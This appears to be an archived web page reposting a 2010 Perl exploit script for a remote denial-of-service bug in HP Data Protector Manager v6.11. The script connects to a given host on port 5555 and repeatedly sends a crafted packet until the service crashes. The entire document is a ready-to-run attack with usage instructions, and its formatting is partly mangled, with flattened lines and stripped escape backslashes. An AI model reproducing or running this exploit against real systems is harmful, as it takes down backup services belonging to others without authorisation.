Home / os / win7

hpdataprotector-null.txt

Posted on 07 October 2010

#!/usr/bin/perl # =============================== # HP Data Protector Manager v6.11 # =============================== # # Bug: NULL Pointer Dereference Remote Denial of Service Vulnerabilities # # Software: http://www.hp.com # Date: 06/10/2010 # Author: Pepelux - pepelux[AT]enye-sec[DOT]com # http://www.enye-sec.org - http://www.pepelux.org # # Vulnerable file: Program FilesOmniBackinMSVCR71.dll # Vulnerable function: wtoi # # Tested on Windows XP SP2 & Windows XP SP3 use IO::Socket; my ($server, $port) = @ARGV ; unless($ARGV[0] || $ARGV[1]) { print "Usage: perl $0 <host> [port] "; print " default port = 5555 "; exit 1; } $port = 5555 if ($ARGV[0]); if ($^O =~ /Win/) {system("cls");}else{system("clear");} my $buf = "x00x00x00x41xffxfex32x00x00x00x20x00x41x00x41x00". "x41x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00". "x00x00x20x00x41x00x41x00x41x00x41x00x41x00x00x00". "x20x00x41x00x41x00x41x00x41x00x41x00x41x00x41x00". "x00x00x20x00x41x00x41x00x41x00xffxffx20x00x31x00". "x35x00x00x00x00x00"; print "[+] Connecting to $server:$port ... "; my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available. "); print "[+] Sending malicious packet ... "; my $crashed = 0; while($crashed eq 0) { print $sock1 "$buf" or $crashed = 1; } print " [x] Server crashed! "; exit;

 

TOP